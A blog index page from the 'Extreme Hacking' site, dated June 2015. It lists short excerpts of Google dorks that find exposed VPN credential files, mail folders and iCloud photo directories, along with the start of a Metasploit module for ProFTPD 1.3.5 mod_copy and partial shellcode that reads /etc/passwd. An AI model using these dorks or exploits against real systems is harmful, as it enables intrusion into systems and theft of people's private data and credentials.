Extreme Hacking

We work in Dark, to serve the Light

Extreme Hacking /

GHDB – inurl:/dbg-wizard.php

Google dork Description: inurl:/dbg-wizard.php

Google search: inurl:/dbg-wizard.php

Submited: 2015-06-03

# Exploit Title: Nusphere PHP DBG wizard
# Date: 02-06-2015
# Vendor Homepage: http://www.nusphere.com
# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm
# Version: any
# Exploit Author: Alfred Armstrong
# Contact: http://twitter.com/alfaguru
# Website: http://figure-w.co.uk

DBG Wizard is meant to be used with the DBG PHP debugger as an aid to
configuring it correctly. It is supplied as a PHP script […]

By |June 23rd, 2015|Files containing juicy info|

GHDB – intitle:”index of” “onetoc2” “one”

Google dork Description: intitle:”index of” “onetoc2” “one”

Google search: intitle:”index of” “onetoc2” “one”

Submited: 2015-06-04

# Exploit Title: intitle:”index of” “onetoc2” “one”
# Google Dork: intitle:”index of” “onetoc2” “one”
# Date: 04/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA

This dork allows you to see Onenote files stored in the open(*.one). […]

By |June 23rd, 2015|Sensitive Directories|

Exploit: ProFTPD 1.3.5 Mod_Copy Command Execution

Advanced Ethical Hacking Institute in Pune
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      ‘Name’           => ‘ProFTPD 1.3.5 Mod_Copy Command Execution’,
      ‘Description’    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the […]

By |June 23rd, 2015|Exploits|

Shellcode: Linux/x86 – /etc/passwd Reader (58 bytes)

Advanced Ethical Hacking Institute in Pune

Linux/x86 – /etc/passwd Reader – 58 bytes

#Greetz : Bomberman(Leader),wiremask.eu
#Author : B3mB4m

#Info
#File descriptor on EBX
#Buffer on ECX
#Bytes to read on EDX

Disassembly of section .text:

08048060 <.text>:
 8048060:    31 c9                    xor    %ecx,%ecx
 8048062:    31 c0                    xor    %eax,%eax
 8048064:    31 d2                    xor    %edx,%edx
 8048066:    51                       push   %ecx
 8048067:    b0 05                    mov    $0x5,%al
 8048069:    68 73 73 77 64           push   $0x64777373
 804806e:    68 […]

By |June 23rd, 2015|Exploits|

White Paper: Escaping VMware Workstation through COM1

Title: Escaping VMware Workstation through COM1
Author: Google Securit

 

By |June 22nd, 2015|White Papers|

GHDB – filetype:pcf vpn OR Group

Google dork Description: filetype:pcf vpn OR Group

Google search: filetype:pcf vpn OR Group

Submited: 2015-06-10

Google Dork: filetype:pcf vpn OR Group
Author: azupwnThis dork allows you to search for publicly accessible profile
configuration files (.pcf) used by VPN clients. These files typically
contain usernames, password, tunneling ports, VPN server information and
other information.

Cheers,

azupwn

By |June 22nd, 2015|Files containing juicy info|

GHDB – inurl:private_files

Google dork Description: inurl:private_files

Google search: inurl:private_files

Submited: 2015-06-10

Directory private files xD.
By Rootkit.

By |June 22nd, 2015|Sensitive Directories|

GHDB – intitle:”Index of” “mail” “Inbox” “Sent”

Google dork Description: intitle:”Index of” “mail” “Inbox” “Sent”

Google search: intitle:”Index of” “mail” “Inbox” “Sent”

Submited: 2015-06-10

This Dork reveal the folders of “Inbox” and “Sent” for mail servers. Enjoy.

By |June 22nd, 2015|Sensitive Directories|

GHDB – intitle:”Index Of” intext:”iCloud Photos”

Google dork Description: intitle:”Index Of” intext:”iCloud Photos” OR intext:”My Photo Stream” OR intext:”Camera Roll”

Google search: intitle:”Index Of” intext:”iCloud Photos” OR intext:”My Photo Stream” OR intext:”Camera Roll”

Submited: 2015-06-17

From: Creep Mode Baby

By |June 22nd, 2015|Sensitive Directories|

GHDB – intitle:”index of” inurl:”no-ip.com”

Google dork Description: intitle:”index of” inurl:”no-ip.com”

Google search: intitle:”index of” inurl:”no-ip.com”

Submited: 2015-06-17

# Exploit Title: intitle:”index of” inurl:”no-ip.com”
# Google Dork: intitle:”index of” inurl:”no-ip.com”
# Date: 17/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NAThis dork allows you to browse files stored on a personal server(home)
using a dynamic dns service […]

By |June 22nd, 2015|Sensitive Directories|